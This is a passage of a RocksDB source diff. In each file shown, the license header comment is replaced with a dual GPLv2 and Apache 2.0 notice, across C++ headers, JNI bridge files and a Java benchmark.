b/include/rocksdb/utilities/geo_db.h index 46034131d7a..408774c5990 100644 --- a/include/rocksdb/utilities/geo_db.h +++ b/include/rocksdb/utilities/geo_db.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/info_log_finder.h b/include/rocksdb/utilities/info_log_finder.h index 4b7530c28ba..6df056ffae8 100644 --- a/include/rocksdb/utilities/info_log_finder.h +++ b/include/rocksdb/utilities/info_log_finder.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/utilities/json_document.h b/include/rocksdb/utilities/json_document.h index f35ae1a3567..5d841f95155 100644 --- a/include/rocksdb/utilities/json_document.h +++ b/include/rocksdb/utilities/json_document.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/ldb_cmd.h b/include/rocksdb/utilities/ldb_cmd.h index 56fed19b830..b9eb1035fb2 100644 --- a/include/rocksdb/utilities/ldb_cmd.h +++ b/include/rocksdb/utilities/ldb_cmd.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/include/rocksdb/utilities/ldb_cmd_execute_result.h b/include/rocksdb/utilities/ldb_cmd_execute_result.h index 35e01bdb18f..5ddc6feb696 100644 --- a/include/rocksdb/utilities/ldb_cmd_execute_result.h +++ b/include/rocksdb/utilities/ldb_cmd_execute_result.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/include/rocksdb/utilities/leveldb_options.h b/include/rocksdb/utilities/leveldb_options.h index 09dff48ea24..fb5a440bbc6 100644 --- a/include/rocksdb/utilities/leveldb_options.h +++ b/include/rocksdb/utilities/leveldb_options.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h b/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h index 825a29a5856..a7af592d8c5 100644 --- a/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h +++ b/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h @@ -1,9 +1,7 @@ // Copyright (c) 2016, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/utilities/lua/rocks_lua_custom_library.h b/include/rocksdb/utilities/lua/rocks_lua_custom_library.h index ffe2837f53b..3ca8b32f3e2 100644 --- a/include/rocksdb/utilities/lua/rocks_lua_custom_library.h +++ b/include/rocksdb/utilities/lua/rocks_lua_custom_library.h @@ -1,9 +1,7 @@ // Copyright (c) 2016, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifdef LUA diff --git a/include/rocksdb/utilities/lua/rocks_lua_util.h b/include/rocksdb/utilities/lua/rocks_lua_util.h index f3637a29b4e..36b007cc73c 100644 --- a/include/rocksdb/utilities/lua/rocks_lua_util.h +++ b/include/rocksdb/utilities/lua/rocks_lua_util.h @@ -1,9 +1,7 @@ // Copyright (c) 2016, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once // lua headers diff --git a/include/rocksdb/utilities/memory_util.h b/include/rocksdb/utilities/memory_util.h index d89bb6adc41..c6128909e90 100644 --- a/include/rocksdb/utilities/memory_util.h +++ b/include/rocksdb/utilities/memory_util.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/object_registry.h b/include/rocksdb/utilities/object_registry.h index 4d12fc14b03..b046ba7c1f5 100644 --- a/include/rocksdb/utilities/object_registry.h +++ b/include/rocksdb/utilities/object_registry.h @@ -1,7 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/utilities/optimistic_transaction_db.h b/include/rocksdb/utilities/optimistic_transaction_db.h index 271905d0d56..02917ff5830 100644 --- a/include/rocksdb/utilities/optimistic_transaction_db.h +++ b/include/rocksdb/utilities/optimistic_transaction_db.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/option_change_migration.h b/include/rocksdb/utilities/option_change_migration.h index 236f1311f35..81f674c9737 100644 --- a/include/rocksdb/utilities/option_change_migration.h +++ b/include/rocksdb/utilities/option_change_migration.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/utilities/options_util.h b/include/rocksdb/utilities/options_util.h index 04ab0e39c15..d02c574104a 100644 --- a/include/rocksdb/utilities/options_util.h +++ b/include/rocksdb/utilities/options_util.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This file contains utility functions for RocksDB Options. #pragma once diff --git a/include/rocksdb/utilities/sim_cache.h b/include/rocksdb/utilities/sim_cache.h index a8581bf2b10..60c73ec5d50 100644 --- a/include/rocksdb/utilities/sim_cache.h +++ b/include/rocksdb/utilities/sim_cache.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/utilities/spatial_db.h b/include/rocksdb/utilities/spatial_db.h index aa33afcbd0b..477b77cf626 100644 --- a/include/rocksdb/utilities/spatial_db.h +++ b/include/rocksdb/utilities/spatial_db.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/table_properties_collectors.h b/include/rocksdb/utilities/table_properties_collectors.h index b7a57d70d16..0f8827037b2 100644 --- a/include/rocksdb/utilities/table_properties_collectors.h +++ b/include/rocksdb/utilities/table_properties_collectors.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/transaction.h b/include/rocksdb/utilities/transaction.h index 92d33739ba2..8507ef133fb 100644 --- a/include/rocksdb/utilities/transaction.h +++ b/include/rocksdb/utilities/transaction.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/utilities/transaction_db.h b/include/rocksdb/utilities/transaction_db.h index e14f9e06db1..259f50fe6a6 100644 --- a/include/rocksdb/utilities/transaction_db.h +++ b/include/rocksdb/utilities/transaction_db.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/transaction_db_mutex.h b/include/rocksdb/utilities/transaction_db_mutex.h index ea35d911c04..df59e7a9e5b 100644 --- a/include/rocksdb/utilities/transaction_db_mutex.h +++ b/include/rocksdb/utilities/transaction_db_mutex.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/write_batch_with_index.h b/include/rocksdb/utilities/write_batch_with_index.h index f429610c414..38809e1c781 100644 --- a/include/rocksdb/utilities/write_batch_with_index.h +++ b/include/rocksdb/utilities/write_batch_with_index.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index eb1ce2ee16a..fb920cf2e7e 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #define ROCKSDB_MAJOR 5 diff --git a/include/rocksdb/wal_filter.h b/include/rocksdb/wal_filter.h index 131fe87e7ce..686fa499893 100644 --- a/include/rocksdb/wal_filter.h +++ b/include/rocksdb/wal_filter.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/include/rocksdb/write_batch.h b/include/rocksdb/write_batch.h index 432a7c19bbb..8bd93d36c4e 100644 --- a/include/rocksdb/write_batch.h +++ b/include/rocksdb/write_batch.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/write_batch_base.h b/include/rocksdb/write_batch_base.h index f1fe754b116..3e6d011bd59 100644 --- a/include/rocksdb/write_batch_base.h +++ b/include/rocksdb/write_batch_base.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/write_buffer_manager.h b/include/rocksdb/write_buffer_manager.h index 185e8baf97b..856cf4b2463 100644 --- a/include/rocksdb/write_buffer_manager.h +++ b/include/rocksdb/write_buffer_manager.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java b/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java index 899a791988a..8af6d2edfb8 100644 --- a/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java +++ b/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). /** * Copyright (C) 2011 the original author or authors. * See the notice.md file distributed with this work for additional diff --git a/java/rocksjni/backupablejni.cc b/java/rocksjni/backupablejni.cc index 6da4575a108..28db2b0210a 100644 --- a/java/rocksjni/backupablejni.cc +++ b/java/rocksjni/backupablejni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::BackupEnginge and rocksdb::BackupableDBOptions methods diff --git a/java/rocksjni/backupenginejni.cc b/java/rocksjni/backupenginejni.cc index 5cf39b32a29..004de976cbe 100644 --- a/java/rocksjni/backupenginejni.cc +++ b/java/rocksjni/backupenginejni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling C++ rocksdb::BackupEngine methods from the Java side. diff --git a/java/rocksjni/cassandra_value_operator.cc b/java/rocksjni/cassandra_value_operator.cc index 17410bd12ae..889213b9c8a 100644 --- a/java/rocksjni/cassandra_value_operator.cc +++ b/java/rocksjni/cassandra_value_operator.cc @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/java/rocksjni/checkpoint.cc b/java/rocksjni/checkpoint.cc index 9832d1a939f..426f5d029e2 100644 --- a/java/rocksjni/checkpoint.cc +++ b/java/rocksjni/checkpoint.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::Checkpoint methods from Java side. diff --git a/java/rocksjni/clock_cache.cc b/java/rocksjni/clock_cache.cc index 1776ae058f9..0a4d7b28d65 100644 --- a/java/rocksjni/clock_cache.cc +++ b/java/rocksjni/clock_cache.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::ClockCache. diff --git a/java/rocksjni/columnfamilyhandle.cc b/java/rocksjni/columnfamilyhandle.cc index 1fb8507741f..6e40a7e010b 100644 --- a/java/rocksjni/columnfamilyhandle.cc +++ b/java/rocksjni/columnfamilyhandle.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::Iterator methods from Java side. diff --git a/java/rocksjni/compaction_filter.cc b/java/rocksjni/compaction_filter.cc index 77ee4d5b5c8..72de46b3fba 100644 --- a/java/rocksjni/compaction_filter.cc +++ b/java/rocksjni/compaction_filter.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::CompactionFilter. diff --git a/java/rocksjni/compaction_options_fifo.cc b/java/rocksjni/compaction_options_fifo.cc index 99a2847cbfe..ef04d81c648 100644 --- a/java/rocksjni/compaction_options_fifo.cc +++ b/java/rocksjni/compaction_options_fifo.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::CompactionOptionsFIFO. diff --git a/java/rocksjni/compaction_options_universal.cc b/java/rocksjni/compaction_options_universal.cc index 74c02886ead..d397db8e438 100644 --- a/java/rocksjni/compaction_options_universal.cc +++ b/java/rocksjni/compaction_options_universal.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::CompactionOptionsUniversal. diff --git a/java/rocksjni/comparator.cc b/java/rocksjni/comparator.cc index aeeb607ab75..5955d0bf75e 100644 --- a/java/rocksjni/comparator.cc +++ b/java/rocksjni/comparator.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::Comparator. diff --git a/java/rocksjni/comparatorjnicallback.cc b/java/rocksjni/comparatorjnicallback.cc index ab868c85da0..73ab46ad218 100644 --- a/java/rocksjni/comparatorjnicallback.cc +++ b/java/rocksjni/comparatorjnicallback.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Comparator. diff --git a/java/rocksjni/comparatorjnicallback.h b/java/rocksjni/comparatorjnicallback.h index ede1292612a..a753008b338 100644 --- a/java/rocksjni/comparatorjnicallback.h +++ b/java/rocksjni/comparatorjnicallback.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Comparator and rocksdb::DirectComparator. diff --git a/java/rocksjni/compression_options.cc b/java/rocksjni/compression_options.cc index a1c2aa154f0..7d5af645ae8 100644 --- a/java/rocksjni/compression_options.cc +++ b/java/rocksjni/compression_options.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::CompressionOptions. diff --git a/java/rocksjni/env.cc b/java/rocksjni/env.cc index 2826c5c8927..dc949a07fa0 100644 --- a/java/rocksjni/env.cc +++ b/java/rocksjni/env.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::Env methods from Java side. diff --git a/java/rocksjni/env_options.cc b/java/rocksjni/env_options.cc index 77703ff6e12..538b0b69f74 100644 --- a/java/rocksjni/env_options.cc +++ b/java/rocksjni/env_options.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling C++ rocksdb::EnvOptions methods diff --git a/java/rocksjni/filter.cc b/java/rocksjni/filter.cc index 2bc84b438ef..7b186b8943c 100644 --- a/java/rocksjni/filter.cc +++ b/java/rocksjni/filter.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::FilterPolicy. diff --git a/java/rocksjni/ingest_external_file_options.cc b/java/rocksjni/ingest_external_file_options.cc index 006ce14e42a..251a6e3c627 100644 --- a/java/rocksjni/ingest_external_file_options.cc +++ b/java/rocksjni/ingest_external_file_options.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::FilterPolicy. diff --git a/java/rocksjni/iterator.cc b/java/rocksjni/iterator.cc index 860c2653012..3ac9d5033f2 100644 --- a/java/rocksjni/iterator.cc +++ 